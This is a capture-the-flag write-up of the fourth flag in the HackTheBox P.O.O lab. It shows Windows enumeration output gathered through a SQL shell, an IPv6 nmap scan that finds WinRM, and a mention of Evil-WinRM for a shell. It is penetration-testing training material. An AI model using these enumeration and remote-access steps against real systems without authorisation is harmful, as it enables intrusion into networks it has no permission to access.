HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)

HackTheBox P.O.O Writeup Series:

1. PART 1: HackTheBox Endgame P.O.O Writeup Part 1 – Recon (Flag 01/05)
2. PART 2: HackTheBox Endgame P.O.O Writeup Part 2 – Huh?! (Flag 02/05)
3. PART 3: HackTheBox Endgame P.O.O Writeup Part 3 – BackTrack (Flag 03/05)
4. PART 4: HackTheBox Endgame P.O.O Writeup Part 4 – Foothold (Flag 04/05)
5. PART 5: p00ned (Coming soon)

The 4th Flag of P.O.O was a bit complicated and time-consuming because I had no idea what to do, I tried Evil WinRM, DCSync, a lot of Impacket tools to gain foothold, all my efforts are in vain.

But as always a simple and straight to the point nudge from a good HTB fellow user made me understand what I supposed to try. I was going in a wrong direction. So here is the writeup of POO Part 5: Foothold.

As I already have Administrator credentials from my previous flag, I tried to log in as Administrator from the SQL Shell python script, I was able to login successfully and get the shell – but the Administrator is a public user with limited access.

I ran couple of commands to find users in the box, Administrator privilages etc.

# root @ ns09 in ~/htb/poo [14:52:36] 
$ python SQL-Explt.py
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net user Administrator
User name                    Administrator
Full Name                    
Comment                      Built-in account for administering the computer/domain
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/4/2018 11:27:10 AM
Password expires             Never
Password changeable          4/5/2018 11:27:10 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   3/6/2020 1:52:59 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> whoami /all

USER INFORMATION
----------------

User Name                   SID                                                          
=========================== =============================================================
nt service\mssql$poo_public S-1-5-80-4078066653-3512796471-551061035-3947311196-544738325


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users    Alias            S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT SERVICE\ALL SERVICES              Well-known group S-1-5-80-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> net users

User accounts for \\COMPATIBILITY

-------------------------------------------------------------------------------
Administrator            DefaultAccount           doobie                   
doobie2                  Guest                    POO_PUBLIC00             
POO_PUBLIC01             POO_PUBLIC02             POO_PUBLIC03             
POO_PUBLIC04             POO_PUBLIC05             POO_PUBLIC06             
POO_PUBLIC07             POO_PUBLIC08             POO_PUBLIC09             
POO_PUBLIC10             POO_PUBLIC11             POO_PUBLIC12             
POO_PUBLIC13             POO_PUBLIC14             POO_PUBLIC15             
POO_PUBLIC16             POO_PUBLIC17             POO_PUBLIC18             
POO_PUBLIC19             POO_PUBLIC20             script                   
WDAGUtilityAccount       
The command completed successfully.

CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> 

At this moment, I’m again clue-less. The Administrator seemed useless for the first time. But, for my surprise, an unintended “ipconfig /all” showed me the machine’s network is configured with preferred IPv6 – dead:babe::1001. The DNS is pointing to “172.20.128.53”. I tried to ping Google DNS 8.8.8.8 it failed. My ping to 172.20.128.53 was successful.

# root @ ns09 in ~/htb/poo [15:07:21] 
$ python SQL-Explt.py                                                                 
Successful login: intranet.poo\Administrator@10.13.38.11
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : COMPATIBILITY
   Primary Dns Suffix  . . . . . . . : intranet.poo
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : intranet.poo

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-76-07
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : dead:babe::1001(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::20ca:ccce:396f:dba1%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.13.38.11(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:babe::1
                                       10.13.38.2
   DNS Servers . . . . . . . . . . . : dead:babe::1
                                       10.13.38.2
   NetBIOS over Tcpip. . . . . . . . : Disabled

Ethernet adapter Ethernet1:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2
   Physical Address. . . . . . . . . : 00-50-56-B9-D9-FF
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 172.20.128.101(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
   DNS Servers . . . . . . . . . . . : 172.20.128.53
   NetBIOS over Tcpip. . . . . . . . : Disabled
CMD MSSQL$POO_PUBLIC@COMPATIBILITY C:\WINDOWS\system32> 

So now I know the IPv6 of the machine I decided to scan the services or open ports.

# root @ ns09 in ~ [15:29:04] 
$ nmap -6 -p- -T4 -A -v dead:babe::1001
Scanning dead:babe::1001 [65535 ports]
Discovered open port 80/tcp on dead:babe::1001
Discovered open port 5985/tcp on dead:babe::1001
Discovered open port 1433/tcp on dead:babe::1001
Nmap scan report for dead:babe::1001
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-server-header: 
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
| ms-sql-ntlm-info: 
|   Target_Name: POO
|   NetBIOS_Domain_Name: POO
|   NetBIOS_Computer_Name: COMPATIBILITY
|   DNS_Domain_Name: intranet.poo
|   DNS_Computer_Name: COMPATIBILITY.intranet.poo
|   DNS_Tree_Name: intranet.poo
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-02-25T19:31:30
| Not valid after:  2050-02-25T19:31:30
| MD5:   10bc d953 87a6 26e9 9eff 885a 4919 425d
|_SHA-1: ac12 0344 6313 bbf4 502c 1984 56a7 deeb 3b9f 5320
|_ssl-date: 2020-03-06T12:35:23+00:00; +7s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=6%D=3/6%OT=80%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=5E624384%P=x8
OS:6_64-pc-linux-gnu)S1(P=600e3b750020067fXX{32}0050a7b8c45a6204d58a27fe80
OS:12ffff50ab0000020405390103030801010402%ST=0.07778%RT=0.272633)S2(P=6008
OS:06730020067fXX{32}0050a7b90af90be6d58a27ff8012ffff602900000204053901030
OS:30801010402%ST=0.178774%RT=0.347316)S3(P=60067b20001c067fXX{32}0050a7ba
OS:bdad2deed58a28007012ffffa07100000204053901030308%ST=0.277737%RT=0.45156
OS:6)S4(P=600ffefb0020067fXX{32}0050a7bb0924a5fcd58a28018012ffffc7e3000002
OS:0405390103030801010402%ST=0.377846%RT=0.552361)S5(P=600d7a440020067fXX{
OS:32}0050a7bcd54f3488d58a28028012ffff6d2a0000020405390103030801010402%ST=
OS:0.478352%RT=0.644463)S6(P=6007ef2c001c067fXX{32}0050a7bd5514f4b0d58a280
OS:37012fc9444b500000204053901010402%ST=0.578091%RT=0.748078)IE1(P=6000{4}
OS:803a7fXX{32}81007f97abcd00{122}%ST=0.602311%RT=0.793024)TECN(P=602359ba
OS:0020067fXX{32}0050a7becf3d00d5d58a28048052ffffa6ab000002040539010303080
OS:1010402%ST=0.807169%RT=0.980875)EXTRA(FL=12345)

Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
| ms-sql-info: 
|   dead:babe::1001:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM+
|       number: 14.00.2027.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: true
|_    TCP port: 1433

TRACEROUTE
HOP RTT       ADDRESS
1   185.30 ms dead:babe::1001
Nmap done: 1 IP address (1 host up) scanned in 368.44 seconds
           Raw packets sent: 131344 (8.408MB) | Rcvd: 230 (14.704KB)
# root @ ns09 in ~ [15:35:16] 
$ 

Well, well, well, I found what I was looking for. The WinRM is running on the port 5985. In the next step I updated my hosts file with newly found IPv6 and used Evil-WinRM to get PowerShell shell.

That’s all folks, Thanks for reading. See you soon with the last part “p00ned”.